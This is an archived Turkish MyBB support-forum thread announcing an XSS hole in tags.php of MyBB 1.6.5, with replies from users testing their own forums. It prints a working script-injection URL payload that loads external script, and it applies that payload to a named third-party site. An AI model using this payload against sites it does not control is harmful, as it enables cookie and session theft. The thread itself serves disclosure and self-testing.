MyBB Destek Forumu

Orjinalini görmek için tıklayınız: Basit etiket sistemindeki Güvenlik Zaafiyeti !
Şu anda (Arşiv) modunu görüntülemektesiniz. Orjinal Sürümü Görüntüle internal link
Sayfalar: 1 2 3
Selamlar.

25/12/2011 Tarihinde myBB 1.6.5 Sisteminde Bug Researcher'lar Tarafından Xss (Cross Site Scripting) Açığı Keşfedildi.

Neler Yapılabilir? ;

Yönlendirme Yapılarak Siteniz Hacklenebilir, Session (Çerez-Oturum) Bilgileri Çalınabilir.

Güvenlik Açığı Oluşturan Dosyalarım Hangileri? ;

Şu Ana Kadar Sadece Tags.php'de Tespit Edildi.

Açığı Kapatmak İçin Neler Yapabilirim ?

Yazdığım Güvenlik Önlemleri Dökümanında Açıklarınızı Kapatmak İçin Yollar Keşfedebilirsiniz.

Güvenlik Önlemleri [Mybb]

Açıklı Sitelerden Bir Örnek ;

Kod:
http://ertebat.in/forum/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Yukarıdaki Sitede Zaafiyet Mevcuttur.

Siz de, Forum Url'nizin Sonunda Alttaki Kodu Ekleyerek, Açık Olup Olmadığını Kontrol Edebilirsiniz,En Basit Yolu Bu .

Kod:
tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Açıklarınızı Kapamak İçin Linkte Verdiğim Dökümanı Okuyunuz, Anlamadığınız Takdirde Yardımımı Esirgemem.

Açıklarınızı Kapamanız Dileğiyle.

Şu Anda, Türk Platformlarında Bu Açığı Yayınlayan Tek Yayın Organı Mybb.Com.TR' Dir.

myBB.Com.Tr Farkı ile, 3spi0n Sundu.
Bilgilendirme için teşekkürler hocam. Ben sitemde denediğimde 404 hata sayfası alıyorum. Temiz miyim sizce?

Kod:
http://www.ebaydestek.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E
(03.01.2012, Saat: 02:46)grdiyan Adlı Kullanıcıdan Alıntı: [ -> ]Bilgilendirme için teşekkürler hocam. Ben sitemde denediğimde 404 hata sayfası alıyorum. Temiz miyim sizce?

Kod:
http://www.ebaydestek.com/tags.php?tag=%22%3E%3Cscript%20src%3d//ckers.org/s%3E%3C/script%3E

Sorun olduğunu zannetmiyorum arkadaşım, zaten kendini belli ediyor yönlenenler örnekteki gibi (:

Sıkıntı olur ise, buralardayız biz.

Hocam bu tagı yazınca ne çıkınca site açık olmuş oluyor?
(03.01.2012, Saat: 02:51)vforvendetta Adlı Kullanıcıdan Alıntı: [ -> ]Hocam bu tagı yazınca ne çıkınca site açık olmuş oluyor?

Örnek siteye bakarsan, anlarsın kardeşim.
Bende dahili bir mysql hatası verdi bu açık var anlamına mı gelir?
Hocam eğer bu tagı yazınca sitenizin görünümü açılıyorsa örnekteki şekilde Ünlem sitenizde açık mevcuttur, diyor arkadaşımız ve bunun için Güvenlik Önlemleri katagorisinden yararlanabilirsiniz.
Sayfalar: 1 2 3